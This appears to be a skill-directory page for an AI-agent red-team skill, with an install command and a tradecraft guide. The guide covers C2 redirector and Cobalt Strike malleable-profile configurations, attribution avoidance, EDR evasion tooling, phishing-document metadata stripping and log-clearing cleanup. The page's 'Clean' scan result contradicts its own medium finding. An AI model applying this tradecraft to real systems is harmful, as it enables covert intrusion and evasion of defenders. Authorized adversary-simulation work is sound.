offensive-advanced-redteam skill
Comprehensive red team operations methodology covering full engagement lifecycle from planning through reporting. Addresses engagement scoping and rules of engagement negotiation, multi-tier C2 infrastructure design with redirectors and domain fronting, malleable traffic profiles and beacon tradecraft, OPSEC discipline including attribution avoidance and indicator management, EDR and AMSI evasion techniques using direct syscalls and unhooking, data collection with chain-of-custody controls, and structured reporting with purple team debrief workflows. Covers assumed-breach, external-to-internal, insider threat, and hybrid physical-cyber engagement scenarios with MITRE ATT&CK mapping throughout. Targets operators planning or executing adversary simulation engagements against mature defenders.
Is the offensive-advanced-redteam skill safe?
Clean: nothing in its files matched our rules. We read 1 file in the folder on 2026-09-28.
- medium
SKILL.md:165Edits shell startup files, cron or launch agents, so something runs again after the skill is done.
./teamserver 127.0.0.1 <password> /path/to/malleable.profile
Install the offensive-advanced-redteam skill
A skill is a folder. Copy it into your agent's skills folder and the agent loads it when the task matches its description.
git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git /tmp/Claude-Red mkdir -p ~/.claude/skills cp -r /tmp/Claude-Red/Skills/infrastructure/offensive-advanced-redteam ~/.claude/skills/offensive-advanced-redteam
In the Claude apps, zip the folder and upload it from the Skills settings. The folder on GitHub
The instructions your agent would load
SKILL.md as published, without the frontmatter. Read it on GitHub
Advanced Red Team Operations
Red team engagements simulate real-world adversaries against an organization's people, processes, and technology. Unlike penetration tests that maximize vulnerability discovery in a fixed scope, red team operations test detection and response capabilities by pursuing specific objectives while evading defenders. You operate under rules of engagement that define what is in bounds, and every action you take must be deliberate, documented, and reversible. This skill covers the full engagement lifecycle from initial planning through final debrief.
Quick Workflow
- Negotiate scope, rules of engagement, and deconfliction procedures with the client.
- Build tiered attack infrastructure with redirectors, aged domains, and valid TLS.
- Configure C2 profiles to blend with the target's legitimate traffic patterns.
- Execute the attack chain while maintaining strict OPSEC and logging every action.
- Collect and stage data with encryption; maintain chain of custody throughout.
- Evade endpoint and network defenses using tested bypass techniques.
- Document findings with MITRE ATT&CK mappings and deliver structured reporting.
- Conduct purple team debrief to validate detection gaps and remediation.
Engagement Planning
Every red team engagement begins with planning that protects both the operator and the client. Skipping this phase leads to scope disputes, legal exposure, and operational failures.
Scope and Objectives
Define what you are testing and what success looks like. Common objective types include data exfiltration (retrieve specific records from a database), domain dominance (obtain Domain Admin or equivalent), business process disruption (demonstrate ability to halt a critical workflow), and physical access (gain entry to a restricted area).
Document explicitly what is out of scope: production systems that cannot tolerate downtime, third-party SaaS platforms without authorization, destructive actions, and social engineering of specific individuals (executives, legal counsel).
Rules of Engagement (ROE)
The ROE is a signed legal document. It must contain:
- Authorization window: exact dates and hours of permitted activity.
- Authorized techniques: which ATT&CK tactics are permitted (e.g., no physical access, no supply chain attacks).
- Notification thresholds: conditions under which you must pause and notify the client (e.g., discovering active threat actor, finding child exploitation material, accidental data destruction).
- Emergency contacts: a 24/7 phone number for immediate deconfliction, not just email.
- Legal shield: explicit written authorization referencing the Computer Fraud and Abuse Act (US), Computer Misuse Act (UK), or equivalent local statute.
Deconfliction
Establish a deconfliction process so defenders can verify whether observed activity is your operation or a real threat. Common approaches:
- Trusted agent model: one or two individuals on the defender side who know the engagement is happening and can confirm or deny your activity via a secure channel.
- Code word system: a unique code word embedded in your tooling or traffic that defenders can query the trusted agent about.
- Deconfliction log: a timestamped record of every action you take, shared with the trusted agent in near-real-time via an encrypted channel.
# Example deconfliction log entry
2026-08-25T14:32:00Z | OPERATOR: kai | ACTION: lateral-movement
TARGET: 10.10.5.22 (WORKSTATION-FIN03)
TECHNIQUE: T1021.006 (Windows Remote Management)
TOOL: evil-winrm via SOCKS proxy
NOTES: creds from LSASS dump on WORKSTATION-FIN01
DECONF-CODE: REDTIGER-4482Communications Security
All operator communications use end-to-end encrypted channels. Never discuss target details over unencrypted email or Slack. Use a dedicated encrypted messaging platform (Signal, Wire, or a self-hosted Matrix instance) for real-time coordination. Transfer files and logs over mutually authenticated TLS or via GPG-encrypted archives.
Infrastructure Setup
Your infrastructure is what separates a red team engagement from a penetration test run out of a Kali VM. Invest time in building infrastructure that is resilient, attributable only to your cover identity, and segmented so that burning one asset does not compromise the operation. Map infrastructure actions to MITRE ATT&CK Resource Development (TA0042).
Tiered Architecture
Segment infrastructure into at least three tiers:
Each tier uses separate domains, separate VPS providers, and separate operator accounts. If T2 is burned, you re-establish interactive access through T3 without re-phishing.
Domain Aging and Reputation
Register domains at least 14-30 days before the engagement. During the aging period:
# Set up a basic landing page to build categorization
sudo certbot certonly --standalone -d ops-portal.example.com
echo "<html><body>Coming soon</body></html>" > /var/www/html/index.html
# Submit to categorization services
# Visit: https://sitereview.bluecoat.com/
# Visit: https://www.fortiguard.com/webfilter
# Categorize as "Business" or "Technology" - never "Uncategorized"
# Verify categorization after 7-10 days
curl -s "https://sitereview.bluecoat.com/resource/lookup" \
-d "url=ops-portal.example.com" | jq .Choose domain names that blend with the target's industry. If the target is a financial firm, domains resembling fintech SaaS products are more plausible than gaming sites.
Redirectors and Traffic Filtering
Never expose your team server directly to the internet. Use redirectors that filter traffic and forward only legitimate beacon callbacks.
# /etc/nginx/sites-available/redirector.conf
# Smart redirector: forward only traffic matching your C2 profile
server {
listen 443 ssl;
server_name ops-portal.example.com;
ssl_certificate /etc/letsencrypt/live/ops-portal.example.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/ops-portal.example.com/privkey.pem;
# Only forward requests with the correct URI and User-Agent
location /api/v2/session {
if ($http_user_agent !~* "Microsoft-Delivery-Optimization") {
return 302 https://www.microsoft.com;
}
proxy_pass https://127.0.0.1:8443;
proxy_ssl_verify off;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
# Everything else redirects to a legitimate site
location / {
return 302 https://www.microsoft.com;
}
}For team server management traffic, use Cloudflare Zero Trust tunnels or SSH tunnels rather than exposing management ports:
# Bind team server to localhost only
./teamserver 127.0.0.1 <password> /path/to/malleable.profile
# Create a Cloudflare tunnel for operator access
cloudflared tunnel create redteam-mgmt
cloudflared tunnel route dns redteam-mgmt mgmt.internal-ops.example.com
cloudflared tunnel run --url tcp://127.0.0.1:50050 redteam-mgmt
# Operators connect through the tunnel
# On operator machine:
cloudflared access tcp --hostname mgmt.internal-ops.example.com --url 127.0.0.1:50050VPS and TLS Certificates
Use VPS providers that accept cryptocurrency or prepaid cards for attribution resistance. Avoid providers that share infrastructure details freely with law enforcement without due process. Always use valid TLS certificates from a public CA; self-signed certificates are trivially fingerprinted by network monitoring.
# Generate a certificate with certbot
sudo certbot certonly --standalone -d c2.example.com
# Convert to Java Keystore for Cobalt Strike
openssl pkcs12 -export -in fullchain.pem -inkey privkey.pem \
-out c2.pkcs12 -name c2 -passout pass:changeit
keytool -importkeystore -srckeystore c2.pkcs12 -srcstoretype pkcs12 \
-destkeystore c2.store -deststorepass changeit -srcstorepass changeitC2 Tradecraft
Command and control is the backbone of your operation. Your C2 traffic must blend with the target's legitimate network activity and survive defender inspection. Map to MITRE ATT&CK Command and Control (TA0011).
Malleable Profiles and Traffic Blending
Study the target's legitimate traffic before writing your malleable profile. If the target is a Microsoft 365 shop, your beacon traffic should resemble Office 365 API calls. If they use AWS heavily, mimic AWS SDK traffic patterns.
# Cobalt Strike malleable C2 profile excerpt - Microsoft 365 blend
set sleeptime "60000";
set jitter "37";
set useragent "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0)";
set host_stage "false";
https-certificate {
set keystore "c2.store";
set password "changeit";
}
http-get {
set uri "/api/v2.0/me/messages";
client {
header "Accept" "application/json";
header "Authorization" "Bearer eyJ0eXAiOi...";
metadata {
base64url;
prepend "ocp-client-id=";
header "Cookie";
}
}
server {
header "Content-Type" "application/json; odata.metadata=minimal";
header "X-MS-Request-Id" "a1b2c3d4-e5f6-7890-abcd-ef1234567890";
output {
base64url;
prepend "{\"@odata.context\":\"https://outlook.office.com/api/v2.0/$metadata#Me/Messages\",\"value\":[{\"Body\":{\"Content\":\"";
append "\"}}]}";
print;
}
}
}
http-post {
set uri "/api/v2.0/me/sendmail";
client {
header "Content-Type" "application/json";
id {
base64url;
prepend "client-request-id=";
header Sleep, Jitter, and Beacon Management
Never use a zero sleep interval except during active hands-on-keyboard sessions, and even then prefer 1-3 seconds. For idle beacons, use long sleep intervals with high jitter to defeat statistical analysis of callback timing.
Set kill dates on every beacon. A forgotten beacon calling back months after the engagement creates legal liability and confusion for the client.
Fallback Channels
Design your C2 with fallback channels so that losing one communication path does not mean losing the implant. A typical fallback chain:
- Primary: HTTPS to domain A through CDN.
- Secondary: DNS-over-HTTPS to domain B.
- Tertiary: DNS TXT record queries to domain C.
- Emergency: ICMP or raw TCP to a hardcoded IP (last resort, high detection risk).
Configure the implant to attempt each channel in order with exponential backoff. If all channels fail, the implant should enter a dormant state and retry periodically rather than generating noisy failed connection attempts.
OPSEC Discipline
OPSEC failures end engagements prematurely. Every action you take leaves traces, and your job is to minimize, control, and eventually clean those traces. Map to MITRE ATT&CK Defense Evasion (TA0005).
Attribution Avoidance
Separate your red team identity from your real identity and from other engagements:
- Use dedicated VPN or Tor for all engagement-related browsing and registration.
- Register domains and VPS under engagement-specific pseudonyms with disposable email addresses.
- Never reuse infrastructure, domains, or tooling across engagements.
- Strip metadata from all files before delivery (EXIF from images, author info from Office documents, build paths from compiled binaries).
# Strip metadata from a phishing document
exiftool -all= phishing_doc.docx
# Verify no identifying metadata remains
exiftool phishing_doc.docx | grep -iE "author|creator|company|producer"
# Strip build paths from a compiled binary (Linux)
strip --strip-all implant
objcopy --remove-section=.note.gnu.build-id implantTool Signature Management
Commercial and open-source tools have known signatures. Modify your tooling to avoid default indicators:
- Cobalt Strike: change the default named pipe patterns, watermark, and process injection techniques. Never use the default profile.
- Mimikatz: compile from source with randomized function names and string encryption, or use alternatives like nanodump, PPLdump, or LSASS dumping via comsvcs.dll.
- Impacket: modify default service names, pipe names, and banner strings that defenders signature.
Indicator Management and Cleanup
Maintain a running list of every indicator you introduce to the target environment: files dropped, registry keys modified, services created, scheduled tasks added, user accounts created. At engagement end, remove every artifact or provide the client with a complete list for their own cleanup.
# Example cleanup script - remove all operator artifacts
# Run this ONLY after documenting everything in your engagement log
# Remove dropped files
Remove-Item -Force "C:\ProgramData\updater.exe"
Remove-Item -Force "C:\Windows\Temp\debug.log"
# Remove persistence mechanisms
Unregister-ScheduledTask -TaskName "WindowsUpdateCheck" -Confirm:$false
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
-Name "Updater"
# Remove created accounts
Remove-LocalUser -Name "svc_backup$"
# Clear operator event log entries (provide log of cleared entries to client)
# WARNING: Only do this if explicitly authorized in the ROEData Handling
More skills from SnailSploit/Claude-Red
- Aoffensive-active-directoryActive Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments.
- Coffensive-ai-security
- Aoffensive-anti-forensicsAnti-forensics and evidence destruction techniques for red team operators conducting authorized engagements. Covers log clearing on Windows (wevtutil, Clear-EventLog, ETW provider patching) and Linux (journal truncation, utmp/wtmp binary editing, syslog manipulation), timestamp manipulation via Timestomp and SetMACE to defeat timeline analysis, filesystem-level anti-forensics including NTFS Alternate Data Streams for payload hiding and secure deletion with sdelete/shred, memory artifact removal to counter live forensics, disk artifact manipulation targeting MFT entries and USN journal records, network forensics evasion through encrypted C2 channels and DNS-over-HTTPS tunneling, and anti-VM/sandbox detection to avoid dynamic analysis environments. Tools: Timestomp, wevtutil, sdelete, shred, MimiPenguin, Invoke-Phant0m. Aligns to MITRE ATT&CK T1070 (Indicator Removal), T1027 (Obfuscated Files or Information), T1497 (Virtualization/Sandbox Evasion). Each technique includes the forensic artifact it targets, the destruction or manipulation method, and the defender perspective so operators understand detection gaps they must account for.
- Aoffensive-api-abuseAdvanced API exploitation methodology focused on business logic abuse and sophisticated attack patterns that bypass traditional security controls. Covers business logic bypass through API call chaining and workflow manipulation. Addresses GraphQL-specific attacks including batching for credential brute-force, query depth exploitation, and introspection abuse. Includes pagination exploitation for data exfiltration, webhook hijacking for SSRF and data interception, and resource exhaustion through algorithmic complexity attacks. Covers race conditions in API transactions using parallel request techniques. Provides comprehensive JWT manipulation including algorithm confusion, kid injection, jku/x5u abuse, and claim tampering. Details API key leakage detection across source repositories, client-side code, and error messages. Covers undocumented endpoint discovery through predictable naming, debug routes, and source map analysis. Tooling includes Arjun, ParamSpider, jwt_tool, and GraphQL Voyager. Designed for authorized penetration testers targeting business logic layers that automated scanners miss.
- Aoffensive-api-securityComprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces. Addresses the full OWASP API Security Top 10 2023 including BOLA/IDOR, broken authentication, excessive data exposure, rate limiting bypass, BFLA, mass assignment, SSRF, and security misconfiguration. Includes REST-specific attacks such as HTTP verb tampering, content-type switching, and parameter pollution. Covers gRPC exploitation through protobuf interception, reflection API enumeration, and metadata injection. Addresses WebSocket vulnerabilities including origin bypass, message injection, and cross-site WebSocket hijacking. Provides tooling guidance for Burp Suite, Postman, grpcurl, websocat, and mitmproxy. Each technique includes detection signatures and defensive indicators so you understand what artifacts your testing leaves behind. Designed for authorized penetration testing engagements against API-driven architectures.
- Aoffensive-bluetooth-bleBluetooth Low Energy (BLE) attack methodology — GATT enumeration, characteristic read/write without auth, pairing downgrade (Just Works forced), LE Secure Connections bypass, MITM via active relay, sniffing with Sniffle (TI CC1352) / Ubertooth / Frontline, encryption key extraction (LE Legacy Pairing crackable, LE Secure Connections strong), proximity authentication abuse (cars, locks), and companion-app trust analysis. Use for IoT BLE devices, smart locks, fitness trackers, medical devices, BLE beacons, or any device pairing over BLE.
- Aoffensive-bluetooth-classicBluetooth Classic (BR/EDR) attack methodology — device discovery, service enumeration via SDP, LMP/L2CAP layer attacks, legacy PIN cracking (BlueBorne / KNOB), Bluetooth file-transfer abuse (BlueSnarfing legacy), unauthenticated profile abuse (HSP, HFP, OPP), and modern relevance against older industrial / automotive / accessory targets. Use when in-scope devices use Bluetooth Classic (Bluetooth ≤ 4.0 BR/EDR) — common in legacy car kits, industrial sensors, older medical devices, and audio accessories.
- Aoffensive-bug-identification
- Aoffensive-business-logicBusiness logic vulnerability testing for web/mobile/API engagements. Covers workflow bypass, state machine violations, multi-step process abuse, price/quantity/discount manipulation, currency confusion, coupon stacking, refund/chargeback abuse, race conditions on logic boundaries, parameter tampering for hidden flows, role/tenant boundary violations, time-of-check vs use, anti-automation defeat, fraud-detection evasion, and subscription/quota abuse. Use when scoping an application after surface-level OWASP Top 10 has been covered, or when the asset is a transactional/marketplace/fintech/e-commerce/SaaS app where logic flaws produce direct financial impact.
- Aoffensive-c2-frameworksCommand and Control framework deployment, configuration, and operational tradecraft for red team engagements. Covers Cobalt Strike (malleable C2 profiles, Beacon types HTTP/HTTPS/DNS/SMB, Beacon Object Files for in-memory execution, sleep and jitter tuning, named pipe pivoting), Sliver (implant generation across mTLS/WireGuard/DNS transport, operator multiplayer mode, armory extensions), Mythic (agent ecosystem with Apollo/Poseidon/Medusa, C2 profile configuration, translation containers), Havoc (Demon agent with sleep obfuscation via Ekko/Zilean, indirect syscalls, dotnet inline execution), Metasploit (msfvenom payload generation, multi/handler staging, Meterpreter post-exploitation modules), redirector architecture using Apache mod_rewrite and Nginx, domain fronting through CDN providers, DNS-based C2 for restrictive network egress, and TLS certificate management for infrastructure OPSEC. Tools: Cobalt Strike, Sliver, Mythic, Havoc, Metasploit Framework. Aligns to MITRE ATT&CK T1071 (Application Layer Protocol), T1573 (Encrypted Channel), T1090 (Proxy/Connection Proxy).
- Doffensive-cicd-pipelineComprehensive CI/CD pipeline exploitation methodology covering GitHub Actions injection vectors (expression injection via PR titles and issue bodies, workflow_run event abuse, GITHUB_TOKEN over-scoping, composite action supply chain compromise), Jenkins attack paths (Groovy sandbox escapes, script console remote code execution, Java remoting deserialization, credential store dumping, shared library injection), GitLab CI exploitation (YAML anchor injection, runner registration token abuse, CI variable extraction, protected branch bypass via merge request pipelines), and Azure DevOps pipeline agent compromise with service connection theft. Includes artifact poisoning techniques across all platforms, tooling guidance for gato and jenkins-attack-framework, and maps to MITRE ATT&CK T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain). Covers enumeration of pipeline configurations, privilege escalation from contributor to code execution, lateral movement through pipeline trust boundaries, and persistence via modified workflow definitions. Each technique section provides working exploitation code, detection indicators, and defensive countermeasures.
- Coffensive-cicd-secretsComprehensive secrets extraction methodology targeting CI/CD environments across all major platforms. Covers environment variable extraction from build contexts, exploitation of vault and secrets-manager misconfigurations (HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, GCP Secret Manager), runner and agent token abuse for lateral movement, OIDC federation attacks exploiting trust relationships between CI/CD providers and cloud platforms, build log leakage analysis for inadvertently exposed credentials, cache poisoning techniques for credential exfiltration, platform-specific credential store exploitation (GitHub Actions secrets, GitLab CI variables, Jenkins credential providers), service connection and service account abuse in Azure DevOps and GCP, and Docker registry credential theft from build environments. Maps to MITRE ATT&CK T1552 (Unsecured Credentials) and its sub-techniques. Each section provides enumeration procedures, extraction techniques, and post-exploitation pivoting guidance for using recovered secrets to expand access.